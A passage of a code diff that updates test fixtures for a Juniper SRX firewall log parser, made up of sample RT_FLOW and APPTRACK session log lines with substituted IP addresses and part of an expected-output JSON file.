service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="81.2.69.193" source-port="33040" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="81.2.69.193" nat-source-port="33040" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" 
username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="81.2.69.193" source-port="33040" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="81.2.69.193" nat-source-port="33040" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="81.2.69.193" source-port="48873" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="48873" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="89.160.20.112" source-port="24065" destination-address="81.2.69.193" destination-port="768" service-name="icmp" nat-source-address="89.160.20.112" nat-source-port="24065" nat-destination-address="81.2.69.193" 
nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="81.2.69.193" source-port="48873" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="48873" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="58943" destination-address="81.2.69.193" 
destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="81.2.69.193" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="81.2.69.193" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE 
[junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="49583" destination-address="89.160.20.112" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="89.160.20.112" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - 
RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="67.43.156.15" source-port="56639" destination-address="67.43.156.15" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] +<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE 
[junos@67.43.156.15 reason="unset" source-address="67.43.156.15" source-port="63456" destination-address="67.43.156.15" destination-port="902" service-name="None" nat-source-address="67.43.156.15" nat-source-port="63456" nat-destination-address="67.43.156.15" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] +<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - 
RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="response received" source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="67.43.156.15" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="67.43.156.15" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] +<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" 
nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] +<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="67.43.156.14" destination-port="53" service-name="junos-dns-udp" nat-source-address="67.43.156.14" nat-source-port="11152" nat-destination-address="67.43.156.14" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] +<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" 
bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] +<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" 
nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:19.040 SRX100HM 
RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" 
destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="58943" destination-address="67.43.156.14" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" 
nat-source-port="6018" nat-destination-address="67.43.156.14" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="67.43.156.15" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="67.43.156.15" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="49583" destination-address="67.43.156.15" destination-port="53" connection-tag="0" 
service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="67.43.156.15" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json index fe582363d5e..0372dd350ea 100644 
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json 
@@ -80,8 +80,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.065983785Z", - "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.706916400Z", + "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" 